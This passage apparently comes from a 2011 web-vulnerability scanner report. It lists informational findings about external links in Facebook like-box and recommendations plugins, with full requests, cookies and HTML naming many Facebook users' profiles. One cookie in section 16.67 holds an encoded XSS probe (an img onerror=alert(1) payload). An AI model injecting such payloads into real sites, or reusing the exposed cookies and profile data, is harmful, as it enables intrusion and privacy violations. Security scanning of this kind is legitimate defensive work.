Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.182.37
X-Cnection: close
Date: Thu, 05 May 2011 11:40:13 GMT
Content-Length: 13057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/techcrunch" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg" alt="TechCrunch" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=649575932" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41711_649575932_6160140_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/kafui.prebbie" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49132_533718073_3136_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002337679715" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195314_100002337679715_4818693_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/katsuhiro.ootomo" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174310_100002069098597_3968774_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000604077298" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211839_100000604077298_6444329_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Franz.Barbieri" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41378_1052920272_6298_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=613106556" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203391_613106556_2350049_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002365579408" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211576_100002365579408_3612087_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1807846432" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_1807846432_6539_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001693667674" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/70762_100001693667674_5838163_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.64. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.132.101
X-Cnection: close
Date: Thu, 05 May 2011 02:00:35 GMT
Content-Length: 12823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/techcrunch" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg" alt="TechCrunch" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/fayse" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203168_583541383_5974255_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173714_100002099733844_620947_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Loizza" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202881_100000740764777_2270693_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27346_218301189_4069_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/patroyo" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173829_1121954486_3643890_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ladonna.lokey" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41763_100000233118312_2392_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000618593365" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161182_100000618593365_7043129_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002304294370" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211402_100002304294370_8323723_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/izaOllie" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187462_1186178049_296688_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.65. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298
The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.73.79
X-Cnection: close
Date: Thu, 05 May 2011 00:59:40 GMT
Content-Length: 16140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/sportingnews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg" alt="Sporting News" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1003057323" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187521_1003057323_1281803_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1605429091" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186714_1605429091_6843314_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/skdarealist" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211386_100000863514899_5837555_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1620706090" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195432_1620706090_6822998_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000505084012" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211544_100000505084012_4898663_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000284158351" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161659_100000284158351_5615996_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000862415977" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_100000862415977_9649_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/deedee.perez1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203061_100001922588645_5847502_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/HockeyKen" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211563_100002020447663_1302764_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002180027523" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202830_100002180027523_7402851_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001677506211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186306_100001677506211_2725896_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/kimberly.christ" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211391_713468228_4670594_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1808982609" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187649_1808982609_3332083_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000541068085" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48975_100000541068085_1143330_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000255574831" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203247_100000255574831_1503849_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lakendra.roberts" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195659_1694427025_5881089_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/KickIceForever" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202988_736611069_7575841_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/theteebers" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211540_1238885907_2541593_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000227723086" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186026_100000227723086_3083391_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.66. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255
The response contains the following links to other domains:
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/161097_930382_8228585_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/161755_1516233108_3624471_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/173823_583081899_855451_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/187666_7306067_1182998_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/202910_30100351_6302006_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/203301_703272195_7499323_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/203376_1020036532_4759583_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/41621_223600395_8552_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/41772_1086137078_8734_q.jpg
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg
  • http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.112.67
X-Cnection: close
Date: Thu, 05 May 2011 00:59:51 GMT
Content-Length: 12626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/techcrunch" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_8062627951_7431_q.jpg" alt="TechCrunch" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202910_30100351_6302006_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41621_223600395_8552_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=703272195" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203301_703272195_7499323_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/robynalys" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187666_7306067_1182998_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/burkerkink" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161097_930382_8228585_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1086137078" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41772_1086137078_8734_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/jezzas" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203376_1020036532_4759583_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=583081899" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173823_583081899_855451_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1516233108" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161755_1516233108_3624471_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.67. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62
The response contains the following links to other domains:
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/23301_286893159420_2873_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/engadget/id347839246?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; _e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.185.35
X-Cnection: close
Date: Thu, 05 May 2011 12:43:23 GMT
Content-Length: 9011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/AppStore" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23301_286893159420_2873_q.jpg" alt="App Store" /></a>
...[SNIP]...

16.68. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://tctechcrunch.files.wordpress.com/2011/05/bill-gates-wired.jpg
  • http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-10-35-12-pm1.png
  • http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-2-29-35-am.png
  • http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-5-12-02-pm.png
  • http://tctechcrunch.files.wordpress.com/2011/05/viber-android.png
